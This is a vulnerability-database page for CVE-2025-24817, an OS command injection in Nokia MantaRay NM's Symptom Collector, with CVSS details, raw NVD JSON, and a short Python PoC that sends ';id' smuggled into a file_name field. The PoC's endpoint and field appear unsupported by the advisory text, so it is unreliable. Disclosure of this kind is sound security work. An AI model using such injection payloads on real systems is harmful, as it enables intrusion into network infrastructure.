Security Vulnerability Report
中文
CVE-2025-24817 CVSS 8.0 HIGH

CVE-2025-24817

Published: 2026-04-07 16:16:23
Last Modified: 2026-04-22 18:54:10
Source: b48c3b8f-639e-4c16-8725-497bc411dad0

Description

Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Symptom Collector application.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nokia:mantaray_nm:*:*:*:*:*:*:*:* - VULNERABLE
Nokia MantaRay NM (具体受影响版本请参考Nokia官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the vulnerable Symptom Collector application target_url = "http://<target_ip>:<port>/api/symptom" # Attacker's controlled input with command injection payload # Example payload: ; id to execute the 'id' command payload_data = { "file_name": "/var/log/syslog; id" } try: # Send POST request to trigger the vulnerability response = requests.post(target_url, data=payload_data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check if the OS command was executed on the target.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-24817", "sourceIdentifier": "b48c3b8f-639e-4c16-8725-497bc411dad0", "published": "2026-04-07T16:16:22.690", "lastModified": "2026-04-22T18:54:09.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Symptom Collector application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nokia:mantaray_nm:*:*:*:*:*:*:*:*", "versionEndExcluding": "25r1-nm", "matchCriteriaId": "C678CD07-A42D-4168-8852-9C232E8DA11B"}]}]}], "references": [{"url": "https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24817/", "source": "b48c3b8f-639e-4c16-8725-497bc411dad0", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.